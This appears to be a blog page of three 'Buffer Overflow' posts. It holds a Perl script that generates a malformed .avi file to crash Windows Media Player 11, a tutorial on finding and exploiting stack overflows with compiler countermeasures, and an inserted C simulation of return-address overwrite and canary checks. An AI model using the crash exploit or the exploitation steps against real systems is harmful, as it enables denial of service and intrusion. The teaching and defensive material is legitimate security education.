3 posts in 'Buffer Overflow'

  1. 2011.04.02 Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit by CEOinIRVINE 2
  2. 2008.12.18 Buffer Overflow by CEOinIRVINE
  3. 2008.10.03 Buffer Overflows by CEOinIRVINE

Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit

Hacking 2011. 4. 2.
#!/usr/bin/perl
#(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
#(+)Software  : Windows Media player
#(+)Version   : 11.0.5721.5145
#(+)Tested On : WIN-XP SP3
#(+) Date     : 31.03.2011
#(+) Hour     : 13:37
#Similar Bug was found by cr4wl3r in MediaPlayer Classic
#
# Proof-of-concept generator: it only writes a 14-byte file, WMPExploit.avi,
# which is then opened by hand in Windows Media Player. The "color", "title",
# "cls" and "pause" calls are for the Windows cmd.exe console it was written for.
use strict;
use warnings;

system("color 6");
system("title Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit");
print "
_______________________________________________________________________

(+)Exploit Title:  Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit


(+) Software  : Windows Media player
(+) Version   : 11.0.5721.5145
(+) Tested On : WIN-XP SP3
(+) Date      : 31.03.2011
(+) Hour      : 13:37
____________________________________________________________________\n    ";
sleep 2;
system("cls");
system("color 2");
print "\nGenerating the exploit file !!!";
sleep 2;

# The payload is not AVI data at all: the 14 bytes are a Standard MIDI File
# header chunk ("MThd", chunk length 6, format 0, 0 tracks, division 0) with
# no track chunk after it, written out under an .avi extension.
my $theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";

# Write the bytes raw (binmode) and fail loudly if the file cannot be created
# or closed, so a silent failure is not mistaken for a player that did not crash.
open(my $fh, '>', 'WMPExploit.avi')
    or die "Cannot create WMPExploit.avi: $!\n";
binmode($fh);
print $fh $theoverflow;
close($fh) or die "Cannot close WMPExploit.avi: $!\n";

print "\n\nWMPExploit.avi file generated!!";
sleep 2;
print "\n\n(+) Done!\n
(+) Now Just open WMPExploit.avi with Windows Media player and Kaboooommm !! ;) \n
(+) Most of the times there is a crash\n whenever you open the folder where the WMPExploit.avi is stored :D \n";

sleep 3;
system("cls");
sleep 1;
system("color C");
print "\n\n\n########################################################################\n
(+)Exploit Coded by: ^Xecuti0N3r\n
(+)^Xecuti0N3r: E-mail : xecuti0n3r@yahoo.com \n
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \n
########################################################################\n\n";
system("pause");

Other posts in the 'Hacking' category

Firewall DoS Attacks  (0) 2011.07.28
IP Spoofing  (1) 2011.07.28
Antivirus and Security software coupons  (0) 2011.03.26
2011 Malware Trends  (0) 2011.03.26
Top Ten Antivirus 2012  (1) 2011.03.26
Posted by CEOinIRVINE

Buffer Overflow

Hacking 2008. 12. 18. 01:28
Posted by CEOinIRVINE

Buffer Overflows

Hacking 2008. 10. 3. 07:19

Buffer overflows are one of the more complex injection attacks, as they take advantage of developers misusing memory. Like command injection, a successful buffer overflow attack can give the attacker control of the remote machine: the attacker's own code runs with the privileges of the vulnerable process.

Note 

This section is intended to give you a feel for buffer overflows; it does not cover them in technical detail. For that, consult other texts and articles such as Aleph One's classic "Smashing The Stack For Fun And Profit" in Phrack magazine (www.phrack.org/archives/49/P49-14).

Some programming languages, such as C and C++, place memory management responsibilities on the developer. If the developer is not careful, user input can be written to memory that was never meant to receive it. One such location is the return address that is saved on the stack when a function is called: it holds the address of the instruction to execute once the function returns. If an application is vulnerable to a buffer overflow, an attacker can send the web application a string that is longer than the developer expected. The excess bytes can overwrite the saved return address and so dictate which machine instructions the web application executes next. The injection aspect of a buffer overflow is that the attacker embeds machine instructions (called shellcode) in the user input. The attacker needs to know, at least approximately, where that shellcode will land in the memory of the computer running the web application, and then overwrites the return address with a pointer to it.

Exploiting a buffer overflow is nontrivial, but finding one is not as difficult, and finding buffer overflows on a local machine is easy: send very long strings to every user input. We suggest predictable strings, such as 10,000 capital As, in each input. If the program crashes on such input, the cause is very likely a memory-safety bug, usually a buffer overflow. Repeat the crash with the application running under a debugger and inspect the registers at the moment of the crash. If you see 41414141 (41 is the ASCII code of a capital A) in the instruction pointer (EIP on 32-bit x86), your input overwrote the return address and you have found an exploitable buffer overflow; the same value in another register that the faulting instruction uses shows the overflow reached other control data and is worth investigating too.

Finding buffer overflows on remote machines, such as a web application, is much more difficult, because the attacker cannot view the web application's registers and may not even be able to tell that the application has crashed. The trick to finding buffer overflows in web applications is the following:

  1. Identify what publicly available libraries or code the web application is running.

  2. Download that code.

  3. Test that code on your local machine to find a buffer overflow.

  4. Develop exploit code that works on your local machine.

  5. Attempt to execute the exploit code on the web application.

Countermeasure Preventing Buffer Overflows

The easiest step is to avoid writing frontend web applications in C and C++; the speed gain is nominal compared to the latency of Internet communication. If you must use code written in C or C++, keep it to a minimum and validate user input, including its length, before passing it to the C or C++ code.

If you cannot avoid programming in C or C++, you can take basic steps to prevent some buffer overflows, such as compiling your code with stack protection. Use the /GS flag when compiling C and C++ code in Visual Studio, and -fstack-protector (or the broader -fstack-protector-strong in newer releases) in SSP-enabled (also known as ProPolice) versions of gcc. Stack protection places a canary value between local buffers and the saved return address and aborts the process if the canary has changed by the time the function returns. It turns a code-execution bug into a crash rather than removing it, and it does nothing for heap overflows or for overwrites of other locals that sit between the buffer and the canary, so it complements input length checks instead of replacing them.
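The mechanism described in the paragraphs above (an unchecked copy running into the saved return address, the 10,000-As and register triage, and the canary check that /GS and -fstack-protector insert), as an added C example that is not code from the original post or from the book it quotes. The stack frame is simulated in a plain byte array with an assumed layout (a 16-byte buffer, a 4-byte canary, then the saved return address), so the "overflow" stays inside one object and the program runs safely; the canary and return values, the Metasploit-style cyclic pattern helper and all function names are this example's own.

```c
/* Added example (not from the original post): a simulated 32-bit stack frame
 * so that the overflow, the 0x41414141 / cyclic-pattern triage and the canary
 * check all run without corrupting the real stack. Layout and values assumed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE     16                /* the local char buffer */
#define CANARY_OFF   BUF_SIZE          /* canary sits right above it ... */
#define RET_OFF      (BUF_SIZE + 4)    /* ... then the saved return address */
#define FRAME_SIZE   (RET_OFF + 4)
#define CANARY_VALUE 0xA5000A5Fu       /* assumed; real canaries are random per process */
#define RET_VALUE    0x08048ABCu       /* assumed legitimate return address */

static uint32_t load_le32(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void store_le32(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}
static void frame_init(unsigned char frame[FRAME_SIZE]) {
    memset(frame, 0, FRAME_SIZE);
    store_le32(frame + CANARY_OFF, CANARY_VALUE);
    store_le32(frame + RET_OFF, RET_VALUE);
}
static uint32_t saved_return(const unsigned char frame[FRAME_SIZE]) { return load_le32(frame + RET_OFF); }
static int canary_intact(const unsigned char frame[FRAME_SIZE]) { return load_le32(frame + CANARY_OFF) == CANARY_VALUE; }

/* The bug: a strcpy-style copy with no bound. It runs past buf into the canary
 * and the saved return address. (Stopping at FRAME_SIZE only keeps the
 * simulation inside its array; a real strcpy stops at the source's NUL.) */
static void copy_unchecked(unsigned char frame[FRAME_SIZE], const char *src) {
    for (size_t i = 0; src[i] != '\0' && i < FRAME_SIZE; i++) frame[i] = (unsigned char)src[i];
}

/* The fix the text asks for: check the length before copying. 0 = copied, -1 = rejected. */
static int copy_bounded(unsigned char frame[FRAME_SIZE], const char *src) {
    size_t n = strlen(src);
    if (n >= BUF_SIZE) return -1;      /* no room for the terminating NUL */
    memcpy(frame, src, n + 1);
    return 0;
}

/* Triage step 1 from the text: a register holding nothing but the fill byte (0x41414141). */
static int looks_like_fill(uint32_t reg, unsigned char fill) { return reg == 0x01010101u * fill; }

/* Triage step 2: the Metasploit-style pattern "Aa0Aa1Aa2..." has a unique 4-byte
 * window at every offset below 20280, so the register value found in the
 * debugger identifies which input offset overwrote the return address.
 * out must have room for len + 1 bytes. */
static void cyclic_pattern(char *out, size_t len) {
    size_t i = 0;
    for (char u = 'A'; ; u = (u == 'Z') ? 'A' : u + 1)
        for (char l = 'a'; l <= 'z'; l++)
            for (char d = '0'; d <= '9'; d++) {
                const char trip[3] = { u, l, d };
                for (int k = 0; k < 3; k++) {
                    if (i == len) { out[i] = '\0'; return; }
                    out[i++] = trip[k];
                }
            }
}
/* Offset of the 4 little-endian bytes that produced reg, or -1 if not in the pattern. */
static long pattern_offset(const char *pattern, size_t len, uint32_t reg) {
    for (size_t off = 0; off + 4 <= len; off++)
        if (load_le32((const unsigned char *)pattern + off) == reg) return (long)off;
    return -1;
}

/* Constructed input: the 10,000 capital As suggested in the text. */
static const char *fill_input(void) {
    static char in[10001];
    memset(in, 'A', 10000); in[10000] = '\0';
    return in;
}
/* Saved return address after the unchecked copy of the As: 0x41414141. */
static uint32_t return_after_fill(void) {
    unsigned char frame[FRAME_SIZE];
    frame_init(frame);
    copy_unchecked(frame, fill_input());
    return saved_return(frame);
}
/* Same crash with the cyclic pattern: the offset that lands in the return slot (20 here). */
static long offset_to_return(void) {
    static char in[10001];
    unsigned char frame[FRAME_SIZE];
    cyclic_pattern(in, 10000);
    frame_init(frame);
    copy_unchecked(frame, in);
    return pattern_offset(in, 10000, saved_return(frame));
}
/* What /GS and -fstack-protector add: the overflow is caught at function exit,
 * before the corrupted return address is ever used. */
static int protector_catches_overflow(void) {
    unsigned char frame[FRAME_SIZE];
    frame_init(frame);
    copy_unchecked(frame, fill_input());
    return !canary_intact(frame);
}
/* With the bounded copy the same input is rejected and the frame is untouched. */
static int bounded_copy_rejects(void) {
    unsigned char frame[FRAME_SIZE];
    frame_init(frame);
    return copy_bounded(frame, fill_input()) == -1 && canary_intact(frame) && saved_return(frame) == RET_VALUE;
}

int main(void) {
    uint32_t ret = return_after_fill();
    printf("saved return after 10,000 'A's : 0x%08x (all fill bytes: %d)\n", (unsigned)ret, looks_like_fill(ret, 'A'));
    printf("pattern offset reaching return : %ld\n", offset_to_return());
    printf("canary detects the overflow    : %d\n", protector_catches_overflow());
    printf("bounded copy rejects the input : %d\n", bounded_copy_rejects());
    return 0;
}
```

Build with `cc -std=c99 -Wall example.c`. In a real target the canary comparison is emitted by the compiler at function exit and the register value comes from EIP under the debugger; here both are read from the simulated frame, which is why the offset (20) equals the distance from the start of the buffer to the saved return slot.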

Other posts in the 'Hacking' category

Reverse Engineering Tutoring 1  (0) 2008.10.04
Testing Injection Exposures  (0) 2008.10.03
LDAP Injection  (0) 2008.10.03
XXE (XML eXternal Entity) Attacks  (0) 2008.10.03
Directory Traversal Attacks  (0) 2008.10.03
Posted by CEOinIRVINE